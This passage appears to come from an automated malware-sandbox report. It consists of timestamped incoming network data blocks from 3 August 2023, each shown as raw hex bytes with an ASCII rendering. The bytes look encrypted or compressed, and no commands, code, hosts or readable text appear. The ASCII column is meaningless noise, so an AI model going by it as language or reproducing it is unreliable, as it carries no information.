dd 99 67 7e 99 d4 22 be 14 d5 a0 1a e3 bc 80 85 9b b6 11 51 80 75 f1 f5 ae 35 3f cb 2d d5 87 83 82 a4 dd 5f 00 32 f8 df 77 8b b6 7c bf b1 4b 2f 20 89 89 0d 19 43 eb 5e 6c 65 a3 fd 78 a0 b0 3e 3f d7 2e fa 0e d9 9e fd
                                                                                                                  Data Ascii: rQ"UJ"OtWg^iZzJAc48;17D"jb;.;BvU(DX,B#V>7=edT>Bb#(njTSz"^n2CRq!{gwCg~"Qu5?-_2w|K/ C^lex>?.
                                                                                                                  2023-08-03 15:59:56 UTC985INData Raw: 5f 32 6c 07 f9 45 31 39 c0 99 8a 5c 98 16 a0 f1 61 03 33 75 00 78 cc 53 07 02 02 25 f2 29 c8 ce 85 88 ba 86 9b 39 c1 8f 51 b6 87 e9 1d ba 2c 51 c3 d1 40 66 4d 05 d5 cf 21 9f 46 ac 5e 0c 4c f1 0e 0c 9a ef ea 1c a5 84 8a 14 77 d0 05 36 10 35 7c 4e 38 41 29 80 9c 9c 75 58 f9 ad a9 68 20 69 12 bf 07 5a f2 37 8b 88 d7 7c ca 06 06 b9 20 fe bd 90 68 a0 7c 33 a9 2b 7d 20 5e fc 98 0d 23 bd 43 aa 2b 6d 9e 98 12 c0 7a 6f 86 29 10 fa 3c 91 b3 ec f8 f2 b6 0f 8d c3 41 0f 7b 90 30 60 49 c6 9f 05 76 7b 51 4f 6c 16 f8 40 a9 e1 85 e2 fe d8 5a da 90 10 8b c4 cc 7d 88 13 96 a6 4c 9c 3c 6d df 45 04 cf 07 ad f8 5c 4d 72 1b cd 16 93 fc 7f e0 c4 c0 dd 5c f7 a5 8f 64 3c 7a bd 6a c7 67 e1 29 f2 ed 30 44 ad 6b 53 14 d3 55 d7 c6 9f ad 84 8c 13 f4 0f 82 c3 f3 c4 a9 31 1b dc e8 66 eb
                                                                                                                  Data Ascii: _2lE19\a3uxS%)9Q,Q@fM!F^Lw65|N8A)uXh iZ7| h|3+} ^#C+mzo)<A{0`Iv{QOl@Z}L<mE\Mr\d<zjg)0DkSU1f
                                                                                                                  2023-08-03 15:59:56 UTC1001INData Raw: 7d fb 20 73 18 e7 b1 23 43 3e 35 41 81 47 53 f7 b0 c8 84 ef 10 71 c0 eb 09 c4 db 7e 05 d3 23 ea 3b 9f 3b 47 24 8c 38 2f b9 21 53 9f 83 35 60 d2 08 b4 81 9b 55 05 81 fa eb fb 44 8b 70 4b fc ce 8c 34 5e 78 62 73 b5 86 5e 8a 3c cb d5 36 d9 db da e9 15 40 de 74 ee b8 3d 25 ba b4 71 f1 a4 cb 57 4c a8 17 f7 a4 0b dd a0 6c af 64 59 7d 7d 13 9a 45 9d 4d bd 6e 17 89 78 b0 fa 49 c9 f3 23 b1 3a 84 b2 93 1e e3 b4 36 4e 8d c0 87 36 d5 0a 8a f7 44 b3 ad 5b 70 1d 8d 80 6b 41 a7 10 d5 ab 1a 8f f1 ed 19 1a 42 9c de a8 31 19 79 a6 99 22 ae eb b6 c0 f8 9a 28 56 d5 7a 3a a2 0b 62 f2 02 63 53 e9 bc e1 02 83 2e 8c 50 57 e3 b2 a3 9e 94 c8 99 09 05 c8 7b 8f 0d e0 e0 4c 01 63 c0 f7 b3 56 e2 67 07 2f 53 45 4c 06 f1 58 25 08 86 ca 44 6c 9d ba 79 b4 f8 81 e9 9f 8f f2 2b 6d 54 13 2c
                                                                                                                  Data Ascii: } s#C>5AGSq~#;;G$8/!S5`UDpK4^xbs^<6@t=%qWLldY}}EMnxI#:6N6D[pkAB1y"(Vz:bcS.PW{LcVg/SELX%Dly+mT,
                                                                                                                  2023-08-03 15:59:56 UTC1017INData Raw: ff 75 34 04 56 ca 59 91 2c 51 3c c9 6f 02 93 1d 8d 08 0f e3 54 60 d4 ed a4 e4 d3 2e 61 57 d6 65 83 34 e2 6c f4 e8 ab fc 8f 6c ab 87 5d a2 03 45 02 67 46 23 04 10 16 c3 e2 26 2f cb bc df cf 59 38 dc bf cc 3b 18 8f ff 90 1d a2 0d 2c 37 56 f8 31 ce ec ca 15 63 6b fe b3 4b a7 6f a6 78 6d cf e0 eb 85 4e 7f 6e 61 88 f2 c1 4c 90 3b f2 52 33 91 25 da 88 2b aa 86 4f 38 e2 1e 64 36 c6 52 1d 6d 0c 42 5b ca 27 f1 79 89 19 50 76 18 6e 27 f6 09 03 cb c2 3a 35 78 e5 46 3e 7f 36 19 70 cb 05 52 22 48 cb 60 8e d4 9d b9 eb 28 5a 0f d2 20 31 1c 66 08 ba 5c c6 9d 23 21 c0 22 3d e9 42 f9 1f 50 93 41 6e 7e a7 d7 82 82 6e 17 89 0a a6 a6 71 05 df 1e c3 c2 47 13 ad 0c 39 32 bd 6a 9b 2a 64 04 6f 22 9c 95 2e 22 4f 40 d2 f8 37 21 24 e5 73 5c ff 88 ca f5 45 30 29 31 c7 3c aa bb 59 0e
                                                                                                                  Data Ascii: u4VY,Q<oT`.aWe4ll]EgF#&/Y8;,7V1ckKoxmNnaL;R3%+O8d6RmB['yPvn':5xF>6pR"H`(Z 1f\#!"=BPAn~nqG92j*do"."O@7!$s\E0)1<Y
                                                                                                                  2023-08-03 15:59:56 UTC1033INData Raw: 13 9e 47 cd 5c 48 be 04 9e 73 5f 4e 28 f4 37 e0 69 27 f1 de 81 41 eb a3 38 0a 61 60 f6 81 d4 98 4f c1 a3 c2 e7 12 4f 00 b7 13 05 4c 34 f6 ca d3 04 40 8b 54 c8 4a 39 b4 e8 26 63 0d 27 8e a9 00 d5 76 3f bc 00 ec e4 46 fb 9c 33 5c eb a6 50 fa 8a 97 e3 ad de 04 ac 38 ab 6a a0 05 43 33 4e 77 2b a9 37 04 31 fb 98 f6 42 b8 e5 f8 bb 0b 75 e5 bd b0 ae 3a 13 d9 7d 4a 02 58 db 5a ca 84 79 4b 7b 4e 10 8b f6 60 dc a5 09 cc b5 12 45 8c 51 28 fd 4b b7 5c ae 0c 29 ba 64 ab 68 3a dd 8f 5b 15 15 ba 40 fb 93 ca 61 fb d3 2c cf 5c fa 90 ab 41 8d ac b7 14 82 a4 bb 7e fe 02 23 06 96 60 b8 f2 d5 a4 7b 22 be 5e 79 e9 1c 8b 3e 4d 4f 92 73 fc ae 0b b0 38 9a 6f 40 f8 31 82 11 a3 d7 7a 36 fb e6 a8 2e 8e ea 95 b8 b6 78 e6 42 51 6a 43 f5 1e 7c ac 83 15 32 e4 41 80 29 62 d4 8e ca 95 36
                                                                                                                  Data Ascii: G\Hs_N(7i'A8a`OOL4@TJ9&c'v?F3\P8jC3Nw+71Bu:}JXZyK{N`EQ(K\)dh:[@a,\A~#`{"^y>MOs8o@1z6.xBQjC|2A)b6
                                                                                                                  2023-08-03 15:59:56 UTC1049INData Raw: ca 67 98 e5 5f d3 6f 97 80 0e 95 96 18 35 23 83 a1 c4 e2 2e 3e 8e 4a dd 99 cd ad 87 38 55 bc 07 a6 80 54 12 0e 57 95 4e 47 0c 06 dd 95 44 ed 2c 23 ec a9 ba b8 ae 76 d9 1f 8e aa 60 23 5e d6 17 e2 34 f9 73 f4 0e 86 c4 ee 7c 5b 63 01 28 fa be 9d 25 f2 bc 26 70 4c d8 8c ad b3 e4 8d 52 04 2c 6d fc 79 91 e8 63 20 e7 58 95 b4 06 f8 19 b0 17 7e 59 c1 d3 d8 a3 f0 e2 22 cb 9a ea 49 a3 2e c6 42 39 f6 09 41 8c d2 5e 1a 6e 49 cb 77 aa f9 27 cc 4e e7 e9 62 cf 73 b5 55 00 52 a7 32 ea f1 60 52 e4 2f 81 a7 1a 63 52 d4 6a c6 2b 52 7e 29 48 24 0c 9d 4d 27 5c 7a 3b 80 73 dc 92 2e c5 fe 8d 03 98 ec 7b be ad de ee 0b 85 95 74 90 b6 08 d0 a9 6d f6 34 3f ac 27 e2 c6 9b de 36 34 e5 57 ca b3 d3 b3 0e 19 8e 68 ee 86 e8 b0 94 f1 7a da 0a 36 15 00 a8 55 4b 45 62 e4 fa 77 20 57 d9 68
                                                                                                                  Data Ascii: g_o5#.>J8UTWNGD,#v`#^4s|[c(%&pLR,myc X~Y"I.B9A^nIw'NbsUR2`R/cRj+R~)H$M'\z;s.{tm4?'64Whz6UKEbw Wh
                                                                                                                  2023-08-03 15:59:56 UTC1065INData Raw: 67 81 c4 ca 14 05 92 4f db ab c4 fb 46 2e 2b 2d a3 47 23 e5 e0 be 4d 0e 4c c5 52 4f b8 0b 3c 5f 48 67 87 be a8 55 c1 87 a1 f5 55 c1 c1 cb 0a 3c 28 6e cd b5 2f fd 22 35 01 d6 9c 9c 4b 0a c1 75 04 6b b4 53 5e e6 38 b7 da b0 86 0c 7e 27 96 60 a8 5a 84 a4 0d c8 f2 b8 ce 06 c5 d8 dc 66 4b d8 72 b0 4d 95 8b 4c 61 62 fb 59 45 d9 57 ee 65 d8 ba 2f 4d 25 68 01 aa 02 c7 04 ac 0e df 75 8e 7f 8a 38 d7 aa 49 b8 7b e6 04 ab 47 50 1a cf fe 8b f9 a5 c3 c7 8e 9e 58 b2 bb fe 6e 3b 77 77 c7 14 a0 0c 7b ac a6 f7 33 bc cf 96 5d 52 39 6b 1c ee ca 4e 63 7a 65 5e 5a 7c e5 d9 dd 50 83 ab 92 ff 8b 5b f7 61 13 5f 0e 21 7a 72 8e f1 8f 3b 09 bc 1d e6 b8 65 14 77 5d 16 5a ae 18 3e 23 61 c9 71 e8 27 9a 4a e5 63 38 d9 23 96 d8 f5 dd 84 8e 1c dc 4c ad fe 3f e4 eb 22 c7 43 4e 9b b6 a0 f0
                                                                                                                  Data Ascii: gOF.+-G#MLRO<_HgUU<(n/"5KukS^8~'`ZfKrMLabYEWe/M%hu8I{GPXn;ww{3]R9kNcze^Z|P[a_!zr;ew]Z>#aq'Jc8#L?"CN
                                                                                                                  2023-08-03 15:59:56 UTC1081INData Raw: a8 33 4a e2 26 5e 32 83 cf 34 ee 53 2a 12 69 9c d1 51 78 87 7a f6 d1 bc ac 03 15 63 e4 bd 93 cd 46 f1 17 cc 89 a3 bf ea f8 76 b2 3a 23 36 6f b0 e4 ba 23 8c 18 45 80 c2 ed 92 a5 5f e3 92 39 6f 7d 3e 31 9a 95 bf 27 2e 09 b2 bd cd 8e 46 1c da 53 6b 4e b2 b4 e1 26 e9 d5 f1 44 ff c1 7e 73 4c 3a 1d 88 01 0b a1 4b e9 6d ef 8a 14 2a 65 53 a8 c3 d6 82 e9 bb 5b c7 d0 91 7e ad 01 c2 30 62 76 57 c4 7a f3 f9 7d 04 86 2d 9c 2e 66 ac 15 7c ef 46 c6 56 c0 93 b4 ff 5e 78 fa b4 10 6e 72 43 16 4f 44 6f c8 c6 d6 34 41 ec 30 07 d7 d9 43 01 ff 91 09 ed ff 31 68 2e a7 c2 a6 3b 19 0c bf f1 47 81 b2 c5 38 9b 6c 6b 3e 5d fc 45 11 bf 41 90 4d fc a1 e0 42 b9 8f 42 03 0f 83 f0 4c c8 98 40 a8 07 ea 1c f3 f1 57 61 8d b4 ca 04 ee 83 e3 46 c2 2b 87 ce 1f 12 35 cb 12 a2 e0 80 96 8f 56 88
                                                                                                                  Data Ascii: 3J&^24S*iQxzcFv:#6o#E_9o}>1'.FSkN&D~sL:Km*eS[~0bvWz}-.f|FV^xnrCODo4A0C1h.;G8lk>]EAMBBL@WaF+5V
                                                                                                                  2023-08-03 15:59:56 UTC1097INData Raw: df 09 88 4e e5 59 75 d7 0f 90 a1 ae 14 63 99 79 28 00 b9 df 7a ca 82 10 9f 3e c7 51 73 fb e6 1c 6c 6f 15 84 50 46 00 62 c1 43 91 9f 26 82 97 ae 61 d4 2d 9c 13 fd 82 c6 b9 5b 5d 92 be 06 4b d0 aa 64 b8 d8 fd a2 bc d9 b9 81 ca 92 68 63 d5 92 19 9c b9 ac 5f 13 79 fc 1f 2e 73 6e 0b af d9 6d fc c6 94 95 6f dc 65 a5 41 a6 84 c8 2c ed 50 8d 91 c6 8f eb e3 89 c7 fb eb 74 66 a3 ce 8a a8 11 51 82 cb 79 28 4a 9f 99 91 fc 38 8d 25 5d 11 04 a3 4a a4 c6 de 11 77 fc 68 b6 bf 6e 67 57 4d c7 02 de 18 c8 bd a9 c8 0b bb 7d 53 0c 0d f3 4c d3 89 02 87 cd 78 40 da 73 3a c8 93 cb b8 4e 5d 44 fb b2 7e 3f de 21 48 d3 18 82 fa 48 e4 be 26 0e 2c 7f bb 62 02 dc d3 72 e8 be de 87 c9 a5 b2 c9 ad 03 bd 4c da e0 49 35 73 ff 4c 31 84 eb 52 1e 87 d8 d7 6e 4c d4 30 76 23 02 d2 2d cd c4 d8
                                                                                                                  Data Ascii: NYucy(z>QsloPFbC&a-[]Kdhc_y.snmoeA,PtfQy(J8%]JwhngWM}SLx@s:N]D~?!HH&,brLI5sL1RnL0v#-
                                                                                                                  2023-08-03 15:59:56 UTC1113INData Raw: 5d ec b4 b2 cd 81 30 87 30 c6 b7 1b 12 cf 15 9a 0e 5c 06 cf 61 19 18 74 3d 5e 8e a3 60 ea 8f 93 24 0a e1 97 c6 a3 2f e0 11 03 cd af 9d 65 47 71 d4 b3 ec c8 77 4f 82 f6 97 ed 2d 51 3d c1 3c d4 ae 53 d0 da 22 ae e5 8d 1c 4b ff fa da af 5e b4 46 fa b6 ea ac b2 5e 68 4f 39 a7 12 8b 4c c2 b0 b1 0a d3 de 50 78 fd 30 bd 52 f7 9a ae 9c 46 e1 30 14 fa d9 06 00 16 92 77 2d 5f 83 60 4c da 6e 91 22 0c 9b e6 04 97 0e 50 fa 02 28 8b 50 f2 2c d7 a2 09 02 46 30 8f d0 cd 3e 50 59 ff 1d 0a 68 22 7e 41 bf 7d f3 06 41 d9 f5 fd 36 2d 94 f0 88 d3 a2 3b b0 5d b5 48 62 a8 19 28 9c 63 72 03 b2 73 f5 91 fc 28 06 df 0a aa 0b 45 bc b2 38 08 68 a7 cd 9c 10 66 e7 e5 62 7e f3 86 2f c7 dc f9 51 79 ea 34 09 df 3a 28 e6 93 4d 26 ce 2a 5b eb 40 e2 f8 96 bd 83 81 ab 00 07 f4 12 b0 44 7f 06
                                                                                                                  Data Ascii: ]00\at=^`$/eGqwO-Q=<S"K^F^hO9LPx0RF0w-_`Ln"P(P,F0>PYh"~A}A6-;]Hb(crs(E8hfb~/Qy4:(M&*[@D
                                                                                                                  2023-08-03 15:59:56 UTC1129INData Raw: ef 21 3d 88 ba 39 4d 8c f6 19 18 44 1c 18 5c 63 98 df e6 4d a2 3d 72 77 77 43 9e 2f 93 ad 79 18 df db 51 cb a1 79 8b bf 6e 1f ef 0b 00 0d 07 95 a9 80 d1 73 34 39 fc a2 87 15 48 9a 57 f8 08 b0 3b 58 8c 6d 1d 9f 3d 7f 1a aa 62 89 94 69 12 1a 4f e6 26 20 cd 56 6c 17 a8 da a7 d5 40 6b f6 ff b5 24 bd a3 fa 69 e2 d1 ba e6 c4 a2 cb 97 e6 11 35 01 3a 5f 7f ab 61 cf 16 aa 5e b4 23 57 28 bf 76 71 46 5b bd a9 b2 49 47 17 26 00 80 1d b7 be 70 c5 e0 a2 20 f0 1b 41 6d a7 9f fb cd 41 84 8f 4e fe e8 e1 7d 97 01 98 31 73 a8 e3 97 fb 2f 60 d4 bf ae e8 c2 55 65 b8 06 c2 76 fc 1a c3 ab 30 e2 fe 9d 97 fc f1 73 50 5b 3b 3e 97 6b 22 2b 34 aa 43 a6 a1 c9 35 40 48 3d 7c 41 89 12 e5 5c 3b b9 21 c8 9e dc d7 7d 58 cd 30 5d 3c 44 4d ed 25 2f bc 30 28 ef be 51 54 4e e5 f5 fa 3e ef 4e
                                                                                                                  Data Ascii: !=9MD\cM=rwwC/yQyns49HW;Xm=biO& Vl@k$i5:_a^#W(vqF[IG&p AmAN}1s/`Uev0sP[;>k"+4C5@H=|A\;!}X0]<DM%/0(QTN>N
                                                                                                                  2023-08-03 15:59:56 UTC1145INData Raw: a2 b2 ff 3c fb 19 7a dc 88 6e eb a8 40 19 f8 67 37 10 0d 66 f5 c2 95 39 da 90 ee 2d c3 91 30 d6 c0 97 26 08 ec 63 4e 3c 7c f0 7d 58 5a 73 f6 78 fe 29 1a a3 25 ce 05 77 c4 8e 2c 5c 58 76 94 09 f1 cf cc 59 ab db 0e 74 6f cd c8 58 27 2f 0e 1f 77 34 ee 35 76 70 5f fc b6 3d b7 2b e3 f2 b3 67 ef f2 49 f4 57 32 8a b9 20 9f 80 8c f4 10 1e 4a 42 2c 3f 4c 36 b0 5c ed 31 2a c2 75 8e a1 d6 9a 06 46 82 67 50 ab e0 87 e4 cd f7 ee 3e c3 7d d7 af 82 40 ee c4 95 3e c5 ed aa a9 a1 22 25 d8 f0 3f 85 95 f3 ad d5 46 45 66 47 aa 97 78 cf 18 85 84 19 a9 7f 02 71 bc 33 a1 c9 76 9f 31 c3 c4 7e 6e 11 cb 6d 58 bd a2 88 f6 81 fa 3a d4 25 0d 7d 37 b5 f1 e5 3f 5a d1 4a ab 77 c1 52 cb fc c7 78 cf 2b b3 0f d8 7f 42 b2 b9 29 c9 b2 b1 fd a2 b0 db 2e d9 64 65 6b 90 e8 c0 43 e2 df 25 35 ad
                                                                                                                  Data Ascii: <zn@g7f9-0&cN<|}XZsx)%w,\XvYtoX'/w45vp_=+gIW2 JB,?L6\1*uFgP>}@>"%?FEfGxq3v1~nmX:%}7?ZJwRx+B).dekC%5
                                                                                                                  2023-08-03 15:59:56 UTC1161INData Raw: f5 73 be 80 7d ba 0a cc e5 6a 54 3b 19 9c 6c ee 43 b5 be 69 b3 a3 22 35 5e f0 89 60 a9 bd 05 1d 8a da d7 b3 26 94 9d 3d 7d 70 c1 48 55 5c d9 95 6e 7e 06 77 be ec 2c 1f 59 dd 0d 0e 8f 49 69 0b d1 ee 2c 0f df 78 90 70 77 8e f4 21 ee 30 bd 48 1a 18 ec 42 ac 73 3e 83 57 77 22 6a 61 33 6d 01 80 7a ec 85 20 ca 67 09 8a f5 b3 18 ed 14 bf c5 68 78 fe 56 d8 85 92 38 b5 af 59 d2 55 8c 7d 06 39 37 b3 43 4d 1a f3 38 e3 a5 a0 29 10 e0 f6 22 70 91 d9 9b db e9 2b f4 9b 73 7d d2 ad c7 75 9f da d3 84 cf 9a c7 db 44 98 92 67 d1 ab c7 5c 37 47 4c ee 2a 84 02 bf c7 58 dd c8 35 b7 8c 09 d6 50 d5 3d 74 ba 6f a5 6b fe 7d 4a d8 1a 67 3b 24 56 ba cd 4a a1 90 da 0b 30 d5 88 90 4b 08 a2 d8 9a b0 39 49 7c 36 7e 66 bd ed 50 11 e9 45 7f 65 90 bf df 2b 77 49 ea 90 24 1d 86 80 53 8b bb
                                                                                                                  Data Ascii: s}jT;lCi"5^`&=}pHU\n~w,YIi,xpw!0HBs>Ww"ja3mz ghxV8YU}97CM8)"p+s}uDg\7GL*X5P=tok}Jg;$VJ0K9I|6~fPEe+wI$S
                                                                                                                  2023-08-03 15:59:56 UTC1177INData Raw: ab 4d 36 51 c2 1d f5 58 f1 44 3c af 8a b9 3b 11 ca 35 96 85 39 98 f4 3f e1 06 c2 8e 71 d1 ef d8 ff ea 03 3a c1 41 28 a4 b3 7b 70 84 59 7b 83 ac e8 92 e1 d5 70 52 13 2c 58 b1 5e 5d f0 7b ca ca 24 4c e4 1d ba a7 c1 ce 4f a6 77 51 d4 b5 66 05 3a 02 e2 2b 3d 5c 46 3e d3 94 b1 f0 38 e1 27 8c be d3 7d ac f3 91 bb 94 6d f8 dc 68 24 db ea 24 a1 2a 40 d1 59 75 a8 4c 8a 6a e3 a0 fd 62 5f 63 a5 30 37 a5 4d 65 2d 37 b9 09 73 82 0e db 71 60 32 a8 f0 03 35 d5 6a ff e7 0b a0 e1 07 6d ec 91 d1 3e 11 ab 76 c4 e6 f1 74 68 bd 67 e0 55 55 4c 22 72 08 ad ac fa 14 5f f5 da cc 53 95 79 75 92 79 27 c4 ec 1a 97 82 fb e2 f7 51 5f 16 74 0f 51 c7 35 54 a1 44 ee f1 6d 63 a1 94 be b8 c8 49 c9 33 23 71 ac ad ba 4f c3 0a da b7 98 a0 87 a3 ea 3a b3 1b c5 7e ba 64 12 8e 34 c1 9c 9e 3e 9c
                                                                                                                  Data Ascii: M6QXD<;59?q:A({pY{pR,X^]{$LOwQf:+=\F>8'}mh$$*@YuLjb_c07Me-7sq`25jm>vthgUUL"r_Syuy'Q_tQ5TDmcI3#qO:~d4>
                                                                                                                  2023-08-03 15:59:56 UTC1193INData Raw: 6c d4 0a 25 f2 03 34 41 85 9a 05 5d bc 77 eb 13 e4 95 6d 9b f9 d8 3f c1 d2 cd 4d 88 e0 58 15 f0 49 14 9b 7e ad 37 73 d7 6b d7 c2 6a d9 8c 95 94 be 9c 6e b3 93 28 10 88 f9 82 ac 4c 18 88 2e dc 99 41 aa 7d 0b eb 69 a2 70 3d 9d da c9 26 0f 84 ee f1 bc 9a f1 f4 fc 41 00 36 e8 84 70 67 6a 10 2f 66 87 91 d6 e3 00 6a d6 2e 86 d4 1c bc 0a 85 3c 6d 37 c9 19 44 1d aa d3 01 e9 7b a9 47 4c 5b 1a d3 b6 24 36 69 e2 0f e6 d4 e4 83 bb 9b 17 bb 90 09 39 9e 83 45 2c 3e fc 72 43 ca 13 8e 8f 3b 10 0e 1c d8 5a 6a 98 d6 d5 95 c7 cd 3f a7 5b 7e e5 3b f4 e0 15 a0 91 7b 5f f2 50 52 d4 7d 85 0f f5 e0 60 27 65 ce 5d 26 71 04 f8 99 59 aa c3 c7 03 43 b3 60 c8 1a 65 6e 88 95 c6 dc 64 0b 00 54 7c 4d 5d b2 e2 5c dc be 46 2f ab 4e 35 ff 93 1e e1 47 0f 95 dc 38 c7 5c 82 8b ad 2b 63 ed e8
                                                                                                                  Data Ascii: l%4A]wm?MXI~7skjn(L.A}ip=&A6pgj/fj.<m7D{GL[$6i9E,>rC;Zj?[~;{_PR}`'e]&qYC`endT|M]\F/N5G8\+c
                                                                                                                  2023-08-03 15:59:56 UTC1209INData Raw: 3d 24 9a b5 fe 90 15 e9 30 91 0e cd a5 cb 55 a9 fb 85 1a d0 51 b0 0f 8f 4a 7e ae ec 35 3c 9c 4f af f4 1a 1d c6 77 f7 3a 21 29 13 e7 62 bb 61 80 99 9d b2 67 1d dc a4 c7 ca 37 3e 30 a0 0d 28 20 cd bd 9e 70 52 8e 38 46 9f 96 42 44 6e 48 80 00 25 6e e4 68 00 42 a2 c4 a5 54 8d 34 60 4d 3a 2b d9 fd c2 73 24 0e b1 7f 3f 72 ae 3f e2 d9 58 ad 79 af 1f 85 85 99 1e 76 95 7d dc a6 5f bc 0f 4e a2 79 69 4e dc 6f 86 e5 05 a7 0f ca e0 41 9d 87 30 7c fd 4f 99 47 ad 5e d5 ff 4e 1d 2a cb 59 71 de a4 59 ab 8a ff 3d 66 17 4c 0d 0c 1b 45 42 8b d7 d6 58 60 a3 78 20 98 a1 29 4c e1 49 55 98 5a 63 9e 8f 48 52 c2 65 bb f0 34 f3 6e 64 6b 45 1b 24 a5 84 76 4f 22 f6 2f a6 3b 06 5f d1 23 8c 3a 28 28 3a 72 74 76 98 ae c3 c0 00 34 57 fe a0 63 e8 c6 ad 95 df 23 1e 85 6d fe be 82 8b b3 0b
                                                                                                                  Data Ascii: =$0UQJ~5<Ow:!)bag7>0( pR8FBDnH%nhBT4`M:+s$?r?Xyv}_NyiNoA0|OG^N*YqY=fLEBX`x )LIUZcHRe4ndkE$vO"/;_#:((:rtv4Wc#m
                                                                                                                  2023-08-03 15:59:56 UTC1225INData Raw: 51 b8 68 62 7d b6 f2 ae 42 e6 56 a8 89 c4 4e 5f 31 94 fa 3d 62 a1 ce e1 d8 ae d6 a3 74 b6 16 d4 10 0d 0d a6 1b 14 cf 9c 31 d6 9e 9d b9 5c 36 ba 6e 9f 7b fc 74 99 a6 60 ac b2 ff 3c fb c7 21 4b 5f 96 18 2b 73 08 33 82 fd a0 c9 4f d8 c2 e5 c8 ee 5e f1 02 4b 8e 7e 19 8b ed 1f 6c 01 9f 4a dc 9b 68 d3 85 6a 61 2c 08 ab 12 be f3 6a d6 d2 c2 dc f8 29 8a 08 8b 58 8e 9f e2 a3 30 f3 dd 2a 59 df 5d c8 46 db 5c fa 16 93 61 08 55 9d e9 09 45 87 9e 3c 0a 3c cb 5a 71 d7 db a1 c0 05 0e c8 4e c7 ab cb d8 df 9a 3d 38 f0 3b 4c cd fd b4 64 d5 2a 55 cc af b9 fc 78 d7 c1 42 82 3e 52 9e 75 e3 ec c4 90 bd 7d 7b f7 c9 0a 69 46 68 7d 9d dc 57 55 07 99 22 e7 31 c2 a4 dd bf c9 b4 45 ae 39 2a ab af 2c 74 d3 aa e4 f2 89 a9 65 e8 02 73 cb 0a 53 4c 93 05 5a c9 01 24 d8 ac ed 98 78 9f f8
                                                                                                                  Data Ascii: Qhb}BVN_1=bt1\6n{t`<!K_+s3O^K~lJhja,j)X0*Y]F\aUE<<ZqN=8;Ld*UxB>Ru}{iFh}WU"1E9*,tesSLZ$x
                                                                                                                  2023-08-03 15:59:56 UTC1241INData Raw: 42 a3 55 c4 89 77 9a c4 c3 ed 2b d9 2e 60 99 3d 44 cf 69 18 33 b7 c8 07 e9 fb 11 d0 ce a3 1f 8b 25 7d 30 62 2c cb 6a 06 4b 91 14 b6 a3 7b 8d 9c 16 fc f9 56 06 f1 eb df 97 df 82 57 03 29 22 c0 b8 57 62 f9 51 8c d0 ab 06 03 43 b2 17 76 7a fc 0b 71 a5 86 77 e2 55 e4 7a 81 7b e7 c9 5e 43 8e 78 09 9d a9 36 a0 2c 7c 6e e9 6b 6a a5 07 c6 83 cb 7f 80 3e 81 92 02 65 97 a4 c5 0f b0 39 c0 c6 25 fa 6b 2c 88 2f fb 49 5f 7c bb af 13 c5 58 4e ed fe 00 d4 b4 d7 11 b4 e8 bf c7 6e cf 25 7d ab 79 f1 e4 e3 b7 08 ad b2 ad 76 00 1f dd 6b fd ca 29 62 0f 59 ff f0 e3 5f 8d dc 95 d4 d3 46 d1 cb fc 2e 1f 3c 52 79 d7 83 dc c5 07 c6 39 fc a8 f9 86 73 f6 5e dd 1a 4f 63 7e 4f a3 78 c0 f9 54 9b 3d 8a 6e b8 69 f3 00 17 87 21 69 43 0a 3c 45 a2 d9 c2 82 2d d6 34 0d 12 74 0e 59 7d 8e 7c 60
                                                                                                                  Data Ascii: BUw+.`=Di3%}0b,jK{VW)"WbQCvzqwUz{^Cx6,|nkj>e9%k,/I_|XNn%}yvk)bY_F.<Ry9s^Oc~OxT=ni!iC<E-4tY}|`
                                                                                                                  2023-08-03 15:59:56 UTC1257INData Raw: 64 d5 d0 46 96 69 e7 f1 b3 e2 16 07 9d 0a b6 ec 1a d1 78 a7 e5 f8 5e f3 1e da 05 a7 45 c3 e0 f7 0d d9 95 a7 fe 33 7e fa ab 5c 5e e7 54 6f 54 5b f9 15 93 12 f7 38 e2 f3 89 6b 70 96 9e 52 f3 48 d5 a7 bc 0d e9 3a ec 28 f1 c0 53 ef 3b 2a 95 af eb 93 84 fc e1 65 6d bc d2 1a 86 a1 8b f6 ce 3f 5e 25 05 51 2f 33 f4 5c dc be f7 33 7c 0f 58 71 e7 5e 00 e8 30 07 e7 68 6c e5 e2 dc e7 2a b0 90 ce 1b 85 f1 bd 7a 56 81 b3 e5 2d fd a6 35 1b 2d 65 f5 3e 74 76 54 73 cb 5d 50 13 07 a9 cd 21 d4 25 8c 2b a8 ab f2 15 63 77 30 ed 0c fb 2c 47 72 fe de 30 a2 b9 af 44 95 d9 d5 9d 8c 9d 7e 5a 8f 06 68 70 66 f1 28 09 66 49 09 13 90 f3 6a e1 5a 56 3f 08 0b 0d 9c 3f ba 2d 4c 10 5e 31 e8 45 1d f0 da f6 b6 0d 20 ef ce d5 22 8a df 34 ac e9 0c 93 b4 aa 70 ff d8 ae 35 a1 0f f7 51 0a f0 45
                                                                                                                  Data Ascii: dFix^E3~\^ToT[8kpRH:(S;*em?^%Q/3\3|Xq^0hl*zV-5-e>tvTs]P!%+cw0,Gr0D~Zhpf(fIjZV??-L^1E "4p5QE
                                                                                                                  2023-08-03 15:59:56 UTC1273INData Raw: 22 c0 fb 4d 91 52 16 ac fc 1a 96 2b 01 2b 3d 80 bb f4 b4 7d a1 a0 fc f7 69 30 3e 4c 27 66 06 9b 6b d9 72 3a 8f d9 04 66 da 40 6c e2 b5 f2 8e ae 21 f9 93 6c bc bb 5b e2 24 a6 d0 f4 99 ff 2f fc 9e 2e b3 f9 e0 f9 2d 30 07 ef 3d f8 83 ce 40 64 e7 64 3e 84 1f 98 e6 b9 c1 25 a0 af a6 9e ec 89 5f 19 1d 03 cd f8 87 51 00 e7 03 46 69 1f 18 69 12 60 01 51 e5 e8 3d 58 92 ef a4 5f 27 e6 0b e9 22 4c 50 e8 53 40 f3 7c d1 8f 6b d1 5a 0f 18 62 e0 99 ec 01 9b fb f9 08 63 06 46 86 1b 56 2d 64 3b 12 7f fb 54 10 9d e6 e8 a5 2d 8d 86 08 a9 8b ab bd b1 48 78 41 7b 71 6c 5e 7e 1c f4 33 01 cf 2b fa e2 df 9e 2f 0a 55 c9 90 18 16 32 82 38 20 6a 28 47 72 70 9e 54 a0 33 13 b7 a3 a9 50 2e ca a4 cd ac 58 0b e8 31 70 47 60 c5 ba c4 46 f7 d2 42 4e 79 ff e6 0d e0 36 b9 8a fb db ee 1a b1
                                                                                                                  Data Ascii: "MR++=}i0>L'fkr:f@l!l[$/.-0=@dd>%_QFii`Q=X_'"LPS@|kZbcFV-d;T-HxA{ql^~3+/U28 j(GrpT3P.X1pG`FBNy6
